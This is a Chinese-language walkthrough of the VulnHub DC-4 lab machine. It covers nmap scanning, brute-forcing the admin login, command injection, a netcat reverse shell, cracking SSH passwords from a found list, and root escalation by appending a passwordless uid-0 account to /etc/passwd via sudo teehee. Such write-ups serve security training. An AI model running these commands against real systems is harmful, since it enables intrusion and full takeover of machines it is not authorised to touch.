vulnhub-DC4

kaliip :192.168.44.131

主机发现

nmap -sP 192.168.44.0/24

DC4ip: 192.168.44.144

端口扫描

nmap -A -p1-65535 -T4 192.168.44.144

开放80、22端口，对应http,ssh服务

访问http服务

指纹识别

whatweb http://192.168.44.144

 得知，web服务器为nginx 1.15.10

爆破吧，猜测用户名为admin，使用kali的/usr/share/john下的password.lst字典

 

 

 

 尝试登录

 成功

（第二种方法，查看源代码

 发现以post方式提交到login.php页面，直接访问login.php页面）

点击command,

出现

 点击RUN，开启抓包，发送到重发器

 查看请求包，响应包，发现radio处的值嵌入到

尝试修改命令，

 

 开启kali监听，nc -lvnp 4444 

监听使用kali的IP  nc 192.168.44.131 -e /bin/bash

 

 成功，反弹交互shell

python -c 'import pty;pty.spawn("/bin/sh")'

 

 看到三个文件夹，应该是三个用户

 

 只有jim可以进入，并且看到old-passwords.bak文件，既然是密码字典，

就尝试爆破jim用户的密码

得到jim的密码 jibril04

ssh [email protected]

 连接成功，并提示有一封邮件，查看

 给出charles用户以及密码，切换用户

charles   ^xHhA&hvim0y

 成功登录，尝试提权

查看用户权限

sudo -l

提示teehee具有root权限

使用teeheem命令创建一个用户uid=0的

sudo teehee -a /etc/passwd

demon::0:0:::/bin/bash